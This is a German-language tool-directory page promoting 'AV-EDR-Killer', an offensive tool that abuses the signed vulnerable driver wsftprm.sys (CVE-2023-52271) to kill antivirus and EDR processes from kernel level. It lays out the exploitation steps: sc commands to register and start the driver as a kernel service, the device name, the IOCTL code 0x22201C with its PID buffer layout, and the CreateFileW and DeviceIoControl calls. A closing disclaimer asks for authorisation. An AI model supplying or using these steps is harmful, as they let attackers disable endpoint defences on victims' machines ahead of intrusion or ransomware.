Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
AV-EDR-Killer — Beendigung von AV/EDR-Prozessen durch Ausnutzung eines verwundbaren Treibers (BYOVD) | Kitploit
Tools/GitHubGitHub/xm0kht4r/av-edr-killer
Privilege EscalationPersistenzmechanismenExploitationIDS/IPS-UmgehungLaterale BewegungPost-ExploitationCommand and ControlRed Teaming
GitHubxm0kht4r/av-edr-killer

AV-EDR-Killer

Beendigung von AV/EDR-Prozessen durch Ausnutzung eines verwundbaren Treibers (BYOVD)

Repository anzeigen
29646vor 7 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

AV/EDR Killer

https://github.com/user-attachments/assets/1eda3340-2af2-4136-b74e-be7a3f4b3924

Dieses Projekt demonstriert, wie ein legitimer und signierter Treiber bewaffnet werden kann, um Zugriff auf Kernel-Ebene zu erhalten.

🚨 Der verwundbare Treiber:

wsftprm.sys , signiert von TPZ SOLUCOES DIGITAIS LTDA, und zuvor einer lokalen Privilegienausweitung ausgesetzt, die öffentlich als CVE-2023-52271 offengelegt wurde, aber irgendwie immer noch nicht auf Microsofts Treiber-Blockliste steht!! 🤫🤫

Die Schwachstelle wird über den IOCTL-Code 0x22201C mit einem 1036-Byte-Puffer ausgelöst, wobei die ersten 4 Bytes die Ziel-Prozess-ID als DWORD enthalten. Der verwundbare Treiber ruft beim Empfang dieses bösartigen IOCTL über DeviceIoControl die importierte Funktion ZwTerminateProcess auf, wodurch jeder Benutzermodusanwendung die Fähigkeit zur Prozessbeendigung auf Kernel-Ebene gewährt wird.

Jeder vernünftige Bedrohungsakteur wird natürlich diese Fähigkeit priorisieren, um kritische Antiviren- (AV) und Endpoint Detection and Response (EDR)-Prozesse zu beenden.

⚡ Ausnutzung:

1. Dienst registrieren:

Starten Sie cmd.exe mit Administratorrechten und registrieren Sie einen Kernel-Treiberdienst mit Typ "Kernel" und binPath, der auf den Ort des verwundbaren Treibers zeigt.

root@kitploit:~
> sc create MalDriver binPath= <path> type= Kernel`
> sc start MalDriver

Sobald der Treiber geladen ist, erstellt er einen symbolischen Link, der für den Benutzermodus als \.\Warsaw_PM zugänglich ist. Diesen können wir nutzen, um über den CreateFileW-API-Aufruf ein Handle auf das Treibergerät zu erhalten.

root@kitploit:~
> CreateFileW(device_name.as_ptr(), GENERIC_READ | GENERIC_WRITE, 0, ptr::null_mut(), OPEN_EXISTING, 0, ptr::null_mut())

Um die bösartigen IOCTLs zu senden, verwenden wir DeviceIoControl mit dem Code 0x22201C und einem Puffer, der in den ersten 4 Bytes eine PID enthält.

root@kitploit:~
> DeviceIoControl(self.hDriver, 0x22201C, buffer.as_mut_ptr() as LPVOID, buffer.len() as u32, ptr::null_mut(), 0, &mut bytes_returned, ptr::null_mut())

2. Gewinn

Cargo build --release um die Binärdatei zu erstellen.

🛠️ Anpassung:

Sie können der Zielliste weitere Prozesse zur Beendigung hinzufügen.

🔒 HAFTUNGSAUSSCHLUSS

Sie sind dafür verantwortlich, dass Sie die entsprechende Genehmigung haben, bevor Sie dieses Tool verwenden. Der Autor übernimmt keine Haftung für Missbrauch.

🤝 Zusammenarbeit

Beiträge und Vorschläge sind willkommen! Wenn Sie Ideen, Verbesserungen haben oder zusammenarbeiten möchten, können Sie mich gerne kontaktieren unter: [email protected]

Tool herunterladen